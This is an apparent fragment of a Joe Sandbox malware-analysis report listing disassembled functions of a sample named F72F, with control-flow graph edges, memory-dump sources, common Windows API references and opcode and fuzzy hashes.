                                                                                                                                                                                                                        • Instruction ID: b7c7ca92cec4b8a61b8f5772701aab3f34dfb6c276271eb9d82c26f201253249
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 006a790dc2046addbe184d71849090f78f45c9c8b40e27241c10f89a86e17654
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8528B30A003099FDB15EF74D894AAEBBB2BFC5301F548968D8469F295DF74AC45CBA0
                                                                                                                                                                                                                        Function 053DDBA0 Relevance: .4, Instructions: 376COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1084 53ddba0-53ddbb6 1086 53ddbb8-53ddbbe 1084->1086 1087 53ddbc1 1084->1087 1088 53ddbc9-53ddbcb 1087->1088 1089 53ddbcd-53ddbd5 1088->1089 1090 53ddbd8-53ddbe4 1088->1090 1092 53ddc5d-53ddc63 1090->1092 1093 53ddbe6-53ddbef 1090->1093 1096 53ddcdc-53ddce5 1092->1096 1097 53ddc65-53ddc6e 1092->1097 1094 53ddbf9-53ddc56 1093->1094 1095 53ddbf1-53ddbf7 1093->1095 1094->1092 1095->1094 1100 53ddcef-53ddd79 1096->1100 1101 53ddce7-53ddced 1096->1101 1098 53ddc78-53ddcd5 1097->1098 1099 53ddc70-53ddc76 1097->1099 1098->1096 1099->1098 1128 53ddd8d-53ddd94 1100->1128 1129 53ddd7b-53ddd85 1100->1129 1101->1100 1130 53dddcd-53ddddb 1128->1130 1131 53ddd96-53dddc5 1128->1131 1129->1128 1135 53ddf25-53ddf29 1130->1135 1136 53ddde1-53ddde5 1130->1136 1131->1130 1138 53ddf3d-53ddf44 1135->1138 1139 53ddf2b-53ddf35 1135->1139 1140 53dddf9-53dde00 1136->1140 1141 53ddde7-53dddf1 1136->1141 1144 53ddf7d-53ddf8f 1138->1144 1145 53ddf46-53ddf75 1138->1145 1139->1138 1142 53dde39-53dde4a 1140->1142 1143 53dde02-53dde31 1140->1143 1141->1140 1153 53de07e-53de087 1142->1153 1156 53dde50-53dde54 1142->1156 1143->1142 1144->1153 1154 53ddf95-53ddf99 1144->1154 1145->1144 1160 53ddfad-53ddfb4 1154->1160 1161 53ddf9b-53ddfa5 1154->1161 1157 53dde68-53dde6f 1156->1157 1158 53dde56-53dde60 1156->1158 1163 53ddea8-53ddebd 1157->1163 1164 53dde71-53ddea0 1157->1164 1158->1157 1165 53ddfed-53de00f 1160->1165 1166 53ddfb6-53ddfe5 1160->1166 1161->1160 1163->1153 1176 53ddec3-53ddec7 1163->1176 1164->1163 1165->1153 1185 53de011-53de015 1165->1185 1166->1165 1179 53ddec9-53dded3 1176->1179 1180 53ddedb-53ddee2 1176->1180 1179->1180 1183 53ddee4-53ddf0f 1180->1183 1184 53ddf17-53ddf24 1180->1184 1183->1184 1189 53de029-53de030 1185->1189 1190 53de017-53de021 1185->1190 1191 53de065-53de07d 1189->1191 1192 53de032-53de05d 1189->1192 1190->1189 1192->1191
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 39b46479a3bcf04637eb93281b58af03159a20757488b3054325cc465c2a6ddd
                                                                                                                                                                                                                        • Instruction ID: a0512ef0047d54118ddb9dc9824c9631d1ca35a5b2e623f6bba4621db556e96f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39b46479a3bcf04637eb93281b58af03159a20757488b3054325cc465c2a6ddd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FD1AE31B00306AFEB14EB65D894B6DBBB3FFC4300F808968D55A9B690DF70AC458B91
                                                                                                                                                                                                                        Function 053DC128 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 588363dd0e746ed35b0b633944dfa750ece02fc095a70ac7522a0483f38cffb4
                                                                                                                                                                                                                        • Instruction ID: b5fc1c1c854bdaae506bfb1ea5806c0306989bf6b866eb44b8c6658eaff15587
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 588363dd0e746ed35b0b633944dfa750ece02fc095a70ac7522a0483f38cffb4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47C18F31A1030A9FDB15EF65E884B7AB7B3BF84301F409968D90A9B655DB70FC45CBA0
                                                                                                                                                                                                                        Function 0274D0A8 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D136
                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0274D173
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D1B0
                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0274D209
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                        • Opcode ID: 3a0df716eb19512a1769fc828f2a108cfdff55929586e1f96bb3f5fff52f3654
                                                                                                                                                                                                                        • Instruction ID: c440fd7fb038994751c7e0d210a9b1ab9bc14508b6247e2b19a9762fbbb81b18
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a0df716eb19512a1769fc828f2a108cfdff55929586e1f96bb3f5fff52f3654
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E5159B090034ACFDB14DFAAD548B9EBBF1BF88314F258459D419A73A0DB345844CF66
                                                                                                                                                                                                                        Function 0274D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D136
                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0274D173
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0274D1B0
                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0274D209
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                        • Opcode ID: c055a1f46412fe2c4a94ada0d77d60273d05a15d038d6fc68c2862d898703b28
                                                                                                                                                                                                                        • Instruction ID: cbc226dd5055ccc8176026d0b1cbac57a2e4bb95d0b4af4228d1ed932e592936
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c055a1f46412fe2c4a94ada0d77d60273d05a15d038d6fc68c2862d898703b28
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE5137B090034ACFDB14DFAAD548B9EBBF1BF88314F258459E419A73A0DB345944CF66
                                                                                                                                                                                                                        Function 0274AE30 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 45 274ae30-274ae3f 46 274ae41-274ae4e call 2749838 45->46 47 274ae6b-274ae6f 45->47 54 274ae64 46->54 55 274ae50 46->55 48 274ae71-274ae7b 47->48 49 274ae83-274aec4 47->49 48->49 56 274aec6-274aece 49->56 57 274aed1-274aedf 49->57 54->47 106 274ae56 call 274b0c8 55->106 107 274ae56 call 274b0b8 55->107 56->57 59 274aee1-274aee6 57->59 60 274af03-274af05 57->60 58 274ae5c-274ae5e 58->54 61 274afa0-274afb7 58->61 63 274aef1 59->63 64 274aee8-274aeef call 274a814 59->64 62 274af08-274af0f 60->62 78 274afb9-274b018 61->78 66 274af11-274af19 62->66 67 274af1c-274af23 62->67 65 274aef3-274af01 63->65 64->65 65->62 66->67 69 274af25-274af2d 67->69 70 274af30-274af39 call 274a824 67->70 69->70 76 274af46-274af4b 70->76 77 274af3b-274af43 70->77 79 274af4d-274af54 76->79 80 274af69-274af76 76->80 77->76 96 274b01a 78->96 79->80 81 274af56-274af66 call 274a834 call 274a844 79->81 86 274af78-274af96 80->86 87 274af99-274af9f 80->87 81->80 86->87 97 274b01c 96->97 98 274b01e-274b046 96->98 97->98 99 274b048-274b060 97->99 98->99 101 274b062-274b065 99->101 102 274b068-274b093 GetModuleHandleW 99->102 101->102 103 274b095-274b09b 102->103 104 274b09c-274b0b0 102->104 103->104 106->58 107->58
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B086
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                        • Opcode ID: b3f5a1ddb459139d13eaf60de6d61fb11b1bc5bfa20b15660fac7431182f569e
                                                                                                                                                                                                                        • Instruction ID: 9a7775de18af3098a1904f84bfece7094640e598adbb3bef9d5284a2e87c2dc4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3f5a1ddb459139d13eaf60de6d61fb11b1bc5bfa20b15660fac7431182f569e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B38156B0A00B058FDB25DF29C05579ABBF5FF89304F008A2DD49A9BA50DB75E846CB90
                                                                                                                                                                                                                        Function 02745935 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 108 2745935-2745936 109 2745938-2745939 108->109 110 274593a 108->110 109->110 111 274593c 110->111 112 274593e 110->112 111->112 113 2745940-2745a01 CreateActCtxA 112->113 115 2745a03-2745a09 113->115 116 2745a0a-2745a64 113->116 115->116 123 2745a66-2745a69 116->123 124 2745a73-2745a77 116->124 123->124 125 2745a88 124->125 126 2745a79-2745a85 124->126 128 2745a89 125->128 126->125 128->128
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 027459F1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                        • Opcode ID: 50b73fb994cf54c9b65bc97327d5b47162625fd7b683319efe24430c76b0e01e
                                                                                                                                                                                                                        • Instruction ID: 585f404bb11d1ecfa93d70cf25dd317b0aed396e2ed71138f0a63c3e3d3437e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50b73fb994cf54c9b65bc97327d5b47162625fd7b683319efe24430c76b0e01e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541F2B0D0071DCFEB24DFA9C884B9EBBB5BF88714F60816AD508AB250DB756945CF50
                                                                                                                                                                                                                        Function 02744248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 129 2744248-2745a01 CreateActCtxA 132 2745a03-2745a09 129->132 133 2745a0a-2745a64 129->133 132->133 140 2745a66-2745a69 133->140 141 2745a73-2745a77 133->141 140->141 142 2745a88 141->142 143 2745a79-2745a85 141->143 145 2745a89 142->145 143->142 145->145
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 027459F1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                        • Opcode ID: 276d8eb8d8cb39387277adcf47f4216a4565c8a5587e599eb2848553742aa6e2
                                                                                                                                                                                                                        • Instruction ID: ffb24e03dd1219d567dd734423c3fb81010a33fad3166df05f76232b0bc9747f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 276d8eb8d8cb39387277adcf47f4216a4565c8a5587e599eb2848553742aa6e2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5141F0B0D00319CFEB24DFA9C884B8EBBB5BF88704F20806AD409AB250DB756945CF90
                                                                                                                                                                                                                        Function 0274D2F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 172 274d2f9-274d2fe 173 274d300-274d394 DuplicateHandle 172->173 174 274d396-274d39c 173->174 175 274d39d-274d3ba 173->175 174->175
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0274D387
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                        • Opcode ID: 197eb890894effb8db5d10d9cc2136808a8f6fd07cb909704217712169ad2a8e
                                                                                                                                                                                                                        • Instruction ID: bd49cd2be7e74f34ef26c39874dbfc8f2969d1ef544fe05e18091a8f47baa897
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 197eb890894effb8db5d10d9cc2136808a8f6fd07cb909704217712169ad2a8e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F21E6B5900349DFDB10CF9AD484ADEBBF5FB48324F14802AE958A3350C774A954CF61
                                                                                                                                                                                                                        Function 0274D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 178 274d300-274d394 DuplicateHandle 179 274d396-274d39c 178->179 180 274d39d-274d3ba 178->180 179->180
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0274D387
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                        • Opcode ID: 8e4a734c9a26b3e1d7dc6ac5164c934242c67e117c8ce0ff1c79795ddfdd8892
                                                                                                                                                                                                                        • Instruction ID: d9f03e0c2f510a10df84d7f8ea38785138284c49d796d7950ea2b9cdca5b3226
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e4a734c9a26b3e1d7dc6ac5164c934242c67e117c8ce0ff1c79795ddfdd8892
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F621E6B5900349DFDB10CF9AD484ADEBBF5FB48314F14801AE958A3350C774A950CF61
                                                                                                                                                                                                                        Function 0274B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 183 274b020-274b060 185 274b062-274b065 183->185 186 274b068-274b093 GetModuleHandleW 183->186 185->186 187 274b095-274b09b 186->187 188 274b09c-274b0b0 186->188 187->188
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B086
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1702181742.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_2740000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                        • Opcode ID: f3aa7a4c57c02a45621c7032e324eb0fe8ffc7983494fccf2754344304c2f06e
                                                                                                                                                                                                                        • Instruction ID: f9d93ad9349a95f51488a80437dd28db1a9428b27369ce250525989b4d4d9926
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3aa7a4c57c02a45621c7032e324eb0fe8ffc7983494fccf2754344304c2f06e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4411DFB5D003498FDB20DF9AC444B9EFBF4AB89624F11842AD429A7610C779A945CFA1
                                                                                                                                                                                                                        Function 053DB5C0 Relevance: .5, Instructions: 533COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 707 53db5c0-53db5dc 708 53db5de-53db5e3 707->708 709 53db627-53db630 707->709 712 53db65c-53db665 708->712 713 53db5e5-53db5ff call 53d2450 708->713 710 53db63a-53db655 709->710 711 53db632-53db638 709->711 710->712 711->710 714 53db66f-53db6a0 712->714 715 53db667-53db66d 712->715 724 53db60a-53db624 713->724 725 53db601-53db607 713->725 730 53db6f4-53db719 714->730 731 53db6a2-53db6cd 714->731 715->714 742 53db71b-53db71f 730->742 743 53db790-53db794 730->743 732 53db8d0-53db923 731->732 733 53db6d3-53db6d7 731->733 758 53dba8e-53dba97 732->758 759 53db929-53db93b 732->759 734 53db6d9-53db6e0 733->734 735 53db6e2-53db6e4 733->735 737 53db6e7-53db6ec 734->737 735->737 739 53db8ae-53db8c0 737->739 751 53db8c6-53db8cd 739->751 752 53db6f1 739->752 747 53db72f-53db73c 742->747 748 53db721-53db72c 742->748 744 53db7cf-53db7e1 743->744 745 53db796-53db79d 743->745 754 53db7f3-53db802 call 53da468 744->754 755 53db7e3-53db7eb 744->755 749 53db79f-53db7be 745->749 750 53db7c6-53db7cc 745->750 756 53db74e-53db75f 747->756 757 53db73e-53db746 747->757 748->747 749->750 750->744 752->730 771 53db804-53db811 754->771 772 53db832-53db834 754->772 755->754 773 53db77b-53db789 756->773 757->756 765 53dba99-53dba9f 758->765 766 53dbaa1-53dbb3c 758->766 767 53db93d 759->767 768 53db942-53db955 759->768 765->766 826 53dbb3e-53dbb40 766->826 827 53dbb9a-53dbba3 766->827 767->768 786 53db97c-53db97e 768->786 787 53db957-53db977 768->787 774 53db823-53db830 771->774 775 53db813-53db81b 771->775 777 53db879-53db87b 772->777 778 53db836-53db83d 772->778 794 53db78b 773->794 795 53db761-53db772 773->795 774->772 775->774 782 53db87d-53db87f 777->782 783 53db8ab 777->783 778->777 784 53db83f-53db852 778->784 790 53db89b-53db8a9 782->790 783->739 792 53db864-53db871 784->792 793 53db854-53db85c 784->793 789 53dba4e-53dba57 786->789 805 53dba5e-53dba64 787->805 797 53dba59 789->797 798 53dba0a-53dba13 789->798 790->783 814 53db881-53db89a 790->814 792->777 809 53db873-53db876 792->809 793->792 794->783 859 53db774 call 53db5a8 795->859 860 53db774 call 53dbb28 795->860 861 53db774 call 53dbb18 795->861 862 53db774 call 53db5c0 795->862 812 53db98e-53db993 797->812 813 53db99b-53db9a1 797->813 802 53dba1d-53dba41 798->802 803 53dba15-53dba1b 798->803 818 53dba48 802->818 803->802 810 53dba6e 805->810 811 53dba66 805->811 809->777 810->758 811->810 812->813 813->818 819 53db9a7-53db9d4 813->819 814->790 825 53dba4d 818->825 829 53db9d6 819->829 830 53db9e0-53db9ed 819->830 820 53db77a 820->773 825->789 833 53dbbcf-53dbbd8 826->833 834 53dbb46-53dbb4a 826->834 831 53dbbad-53dbbc8 827->831 832 53dbba5-53dbbab 827->832 829->830 830->825 843 53db9ef-53dba08 830->843 831->833 832->831 838 53dbbda-53dbbe0 833->838 839 53dbbe2-53dbc60 833->839 836 53dbb4c-53dbb51 834->836 837 53dbb54-53dbb5c 834->837 855 53dbb5e call 53dc118 837->855 856 53dbb5e call 53dbfe8 837->856 857 53dbb5e call 53dc020 837->857 858 53dbb5e call 53dc000 837->858 838->839 843->805 846 53dbb64-53dbb97 855->846 856->846 857->846 858->846 859->820 860->820 861->820 862->820
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7f37391cdb5ac95d9c486ae947877c160660d240b18f2210b0e9953c6d0fb208
                                                                                                                                                                                                                        • Instruction ID: 6865fbc99713af53309b3a0c227e3ba699a9db23ed8865ee92c233eb8ca442e5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f37391cdb5ac95d9c486ae947877c160660d240b18f2210b0e9953c6d0fb208
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B126935A042048FDB15DF65D4A4AAEBBF2BF88300F168469E846DB391DB74ED41CFA0
                                                                                                                                                                                                                        Function 053DC6F8 Relevance: .4, Instructions: 450COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 863 53dc6f8-53dc727 864 53dc72d-53dc768 863->864 865 53dcd02-53dcd11 863->865 883 53dc76a-53dc77b 864->883 884 53dc783-53dc78c 864->884 866 53dcd1c-53dcd6c 865->866 867 53dcd13-53dcd19 865->867 876 53dcd6e-53dcd74 866->876 877 53dcd7a-53dcd87 866->877 867->866 876->877 878 53dce27-53dce30 876->878 879 53dcdf1-53dcdff 877->879 880 53dce3a-53dce9d 878->880 881 53dce32-53dce38 878->881 890 53dcd89-53dcda5 879->890 891 53dce01-53dce07 879->891 938 53dcea4-53dcead 880->938 881->880 883->884 888 53dc78e-53dc798 884->888 889 53dc7a0-53dc7a7 884->889 888->889 895 53dc7a9-53dc7df 889->895 896 53dc7e7-53dc800 889->896 919 53dcda7-53dcdb0 890->919 920 53dcdb2-53dcdb8 890->920 892 53dce0d-53dce17 891->892 893 53dcf48-53dcf51 891->893 897 53dce1d-53dce24 892->897 898 53dcfc5-53dcfce 892->898 899 53dcf5b-53dcfbe 893->899 900 53dcf53-53dcf59 893->900 895->896 911 53dc806-53dc80f 896->911 912 53dc883-53dc8ea 896->912 905 53dcfd8-53dcffd 898->905 906 53dcfd0-53dcfd6 898->906 899->898 900->899 950 53dd003-53dd054 905->950 906->905 916 53dc811-53dc81b 911->916 917 53dc823-53dc82a 911->917 977 53dc8ec-53dc8f6 912->977 978 53dc8fe-53dc905 912->978 916->917 922 53dc82c-53dc862 917->922 923 53dc86a-53dc880 917->923 919->920 935 53dcdd5-53dcdde 919->935 924 53dcdcc-53dcdd3 920->924 925 53dcdba-53dcdbe 920->925 922->923 923->912 932 53dcdf0 924->932 925->924 930 53dcdc0-53dcdc6 925->930 930->924 930->938 932->879 951 53dcde9 935->951 952 53dcde0-53dcde7 935->952 943 53dceaf-53dceb5 938->943 944 53dceb7-53dcecf 938->944 943->944 959 53dcee1-53dcf41 944->959 960 53dced1-53dced9 944->960 984 53dd056 950->984 951->932 952->932 959->893 960->959 977->978 979 53dc945-53dc952 978->979 980 53dc907-53dc93d 978->980 988 53dc958-53dc961 979->988 989 53dca53-53dca5c 979->989 980->979 990 53dc975-53dc97c 988->990 991 53dc963-53dc96d 988->991 993 53dca5e-53dca68 989->993 994 53dca70-53dca77 989->994 998 53dc9bc-53dc9e2 990->998 999 53dc97e-53dc9b4 990->999 991->990 993->994 996 53dca79-53dcaaf 994->996 997 53dcab7-53dcad6 994->997 996->997 1013 53dcadc-53dcae5 997->1013 1014 53dccf8-53dccff 997->1014 1022 53dc9e4-53dc9ee 998->1022 1023 53dc9f6-53dc9fd 998->1023 999->998 1015 53dcafc-53dcb03 1013->1015 1016 53dcae7-53dcaf4 1013->1016 1020 53dcb05-53dcb3b 1015->1020 1021 53dcb43-53dcb50 1015->1021 1016->1015 1020->1021 1032 53dcc54-53dcc9d call 53d5680 call 53d5990 1021->1032 1033 53dcb56-53dcb5f 1021->1033 1022->1023 1026 53dca3d-53dca4b 1023->1026 1027 53dc9ff-53dca35 1023->1027 1026->989 1027->1026 1032->1014 1071 53dcc9f-53dcccb call 53d5990 1032->1071 1036 53dcb76-53dcb7d 1033->1036 1037 53dcb61-53dcb6e 1033->1037 1040 53dcbbd-53dcbe3 1036->1040 1041 53dcb7f-53dcbb5 1036->1041 1037->1036 1058 53dcbe5-53dcbef 1040->1058 1059 53dcbf7-53dcbfe 1040->1059 1041->1040 1058->1059 1062 53dcc3e-53dcc4c 1059->1062 1063 53dcc00-53dcc36 1059->1063 1062->1032 1063->1062 1071->1014 1079 53dcccd-53dcce8 call 53d5990 1071->1079 1083 53dccf0 1079->1083 1083->1014
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: d7242ecfdf79c5003cebfd35a7f1860636637a09645a0e80d5550b5060dee7b8
                                                                                                                                                                                                                        • Instruction ID: 0c36faa572f05b9570911218a1be7a8db20ffccffefacd028ea91d94bfaf83ca
